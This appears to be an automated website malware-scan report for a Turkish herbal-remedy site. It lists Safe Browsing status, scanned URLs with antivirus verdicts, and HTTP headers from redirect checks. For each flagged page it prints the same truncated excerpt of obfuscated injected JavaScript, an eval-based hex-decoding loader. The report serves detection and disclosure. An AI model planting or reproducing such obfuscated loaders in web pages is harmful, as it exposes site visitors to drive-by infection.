Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bitkilerlesedeftedavisi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bitkilerlesedeftedavisi.com/ | 200 OK Content-Length: 33013 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://bitkilerlesedeftedavisi.com/templates/yellowflower/script.js | 200 OK Content-Length: 6355 Content-Type: application/x-javascript | clean |
http://aff3.gittigidiyor.com/affiliate_front.js | 200 OK Content-Length: 924 Content-Type: text/javascript | clean |
http://bitkilerlesedeftedavisi.com/index.php | 200 OK Content-Length: 33013 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?option=com_content&view=article&id=48&Itemid=54 | 200 OK Content-Length: 31413 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?view=article&catid=34%3Abitkilerlesedef&id=48%3Aromatzma-btksel-tedav&format=pdf&option=com_content&Itemid=54 | 200 OK Content-Length: 251757 Content-Type: application/pdf | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/test404page.js | 404 Not Found Content-Length: 304 Content-Type: text/html | clean |
http://bitkilerlesedeftedavisi.com/index.php?view=article&catid=34%3Abitkilerlesedef&id=48%3Aromatzma-btksel-tedav&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=54 | 200 OK Content-Length: 13693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL2JpdGtpbGVybGVzZWRlZnRlZGF2aXNpLmNvbS9pbmRleC5waHA/b3B0aW9uPWNvbV9jb250ZW50JnZpZXc9YXJ0aWNsZSZpZD00ODpyb21hdHptYS1idGtzZWwtdGVkYXYmY2F0aWQ9MzQ6Yml0a2lsZXJsZXNlZGVmJkl0ZW1pZD01NA== | 200 OK Content-Length: 7661 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?option=com_content&view=article&id=48%3Aromatzma-btksel-tedav&catid=34%3Abitkilerlesedef&Itemid=54 | 200 OK Content-Length: 31413 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?option=com_content&view=article&id=47%3Adamar-tikaniklii-btklerle-tedav&catid=34%3Abitkilerlesedef&Itemid=54 | 200 OK Content-Length: 32592 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?view=article&catid=34%3Abitkilerlesedef&id=47%3Adamar-tikaniklii-btklerle-tedav&format=pdf&option=com_content&Itemid=54 | 200 OK Content-Length: 252941 Content-Type: application/pdf | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?view=article&catid=34%3Abitkilerlesedef&id=47%3Adamar-tikaniklii-btklerle-tedav&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=54 | 200 OK Content-Length: 14840 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
| ||
http://bitkilerlesedeftedavisi.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL2JpdGtpbGVybGVzZWRlZnRlZGF2aXNpLmNvbS9pbmRleC5waHA/b3B0aW9uPWNvbV9jb250ZW50JnZpZXc9YXJ0aWNsZSZpZD00NzpkYW1hci10aWthbmlrbGlpLWJ0a2xlcmxlLXRlZGF2JmNhdGlkPTM0OmJpdGtpbGVybGVzZWRlZiZJdGVtaWQ9NTM= | 200 OK Content-Length: 7673 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fks="y";dra="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[dra].body)==null}()}catch(jejyat){lcsbx=function(qnhme){qnhme="fr"+"omCh"+qnhme;for(owqtj=0;owqtj<fks.length;owqtj++){hgrcmf+=String[qnhme](ryjhst(ujuevi+(fks[owqtj]))-(79));}};};ryjhst=(eval);ujuevi="0x";futkj=0;try{;}catch(kxqssg){futkj=1}if(!futkj){try{++ryjhst(dra)["bo"+"d"+fks]}catch(jejyat){uhy="^";}fks="6f^b5^c4^bd^b2^c3^b8^be^bd^6f^c6^7f^88^77^78^6f^ca^5c^59^6f^c5^b0^c1^6f^c2^c3^b0^c3^b8^b2^8c^76^b0^b9 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bitkilerlesedeftedavisi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 12 Jul 2014 04:20:09 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 12 Jul 2014 04:20:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f5855993f10976332e045a86a3dc88d6=upbmkhupejgft76n46dnpljdj3; path=/
X-Powered-By: PHP/5.2.17
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: bitkilerlesedeftedavisi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 12 Jul 2014 04:20:09 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 12 Jul 2014 04:20:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f5855993f10976332e045a86a3dc88d6=upbmkhupejgft76n46dnpljdj3; path=/
X-Powered-By: PHP/5.2.17
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: bitkilerlesedeftedavisi.com
Referer: http://www.google.com/search?q=bitkilerlesedeftedavisi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bitkilerlesedeftedavisi.com
Referer: http://www.google.com/search?q=bitkilerlesedeftedavisi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.